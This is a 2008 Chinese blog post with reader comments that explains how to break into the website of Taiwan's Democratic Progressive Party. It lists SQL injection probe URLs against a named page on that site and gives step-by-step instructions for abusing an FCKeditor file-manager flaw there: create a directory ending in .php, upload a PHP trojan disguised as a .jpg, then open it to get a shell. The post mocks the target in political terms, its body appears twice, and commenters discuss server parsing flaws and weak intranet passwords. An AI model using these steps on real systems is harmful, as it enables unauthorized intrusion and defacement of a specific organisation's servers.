上一篇
下一篇
爆料下黑“民进党网站”的法子
作者:friddy 日期:2008-12-23
2009年1月4日测试
SQL Injection:
URL:http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547
test:
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=1
返回正常
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=2
返回错误
before 2008.12.23
民进党网站用的文本编辑器也是FCKeditor。它的漏洞是很多的,具体利用也很简单。。。。。。
IE中输入http://www.dpp.org.tw/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image/&Connector=connectors/php/connector.php
Image可以用任意其他的单词代替,而且系统会自动建立以此单词为名的文件夹,而且可以上传任意类型的文件。
1.先建立一个目录,例如:friddy.php
2.上传以jpg结尾的php木马
3.访问这个文件就OK了
其实就这么容易黑~~~
对于台独的垃圾网站,的确就这么垃圾。。。。。
SQL Injection:
URL:http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547
test:
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=1
返回正常
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=2
返回错误
before 2008.12.23
民进党网站用的文本编辑器也是FCKeditor。它的漏洞是很多的,具体利用也很简单。。。。。。
IE中输入http://www.dpp.org.tw/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image/&Connector=connectors/php/connector.php
Image可以用任意其他的单词代替,而且系统会自动建立以此单词为名的文件夹,而且可以上传任意类型的文件。
1.先建立一个目录,例如:friddy.php
2.上传以jpg结尾的php木马
3.访问这个文件就OK了
其实就这么容易黑~~~
对于台独的垃圾网站,的确就这么垃圾。。。。。
文章来自: 
引用通告: 
Tags: 评论: 6 | 引用: 0 | 查看次数: 2296
回复
他怎么能确定是这样拿的shell呢,是忽悠我们呢,还是你本身被忽悠了
删帖吧
friddy 回复
删帖吧
friddy 回复XX党的网站不是我黑的。但是的确是可以通过FCKeditor来黑的,黑的办法当然有很多种。
叫我删帖?下辈子吧!
叫我删帖?下辈子吧!
-_-! 这样也可以?????Win2003的服务器好像能建立.asp目录拿shell,难道php的也可以?
friddy 回复
friddy 回复IIS加载php的ISAPI扩展就可以解析php了,这个解析漏洞存在于ntfs的系统,而不在于是哪种后缀。
你确定你这样可以获取SHELL?
是被封的网站,看来需要代理了...
罕见的人才啊
发表评论
我知道是谁先进去的。。。呵呵。内网的弱口令和漏洞 也不少!~!~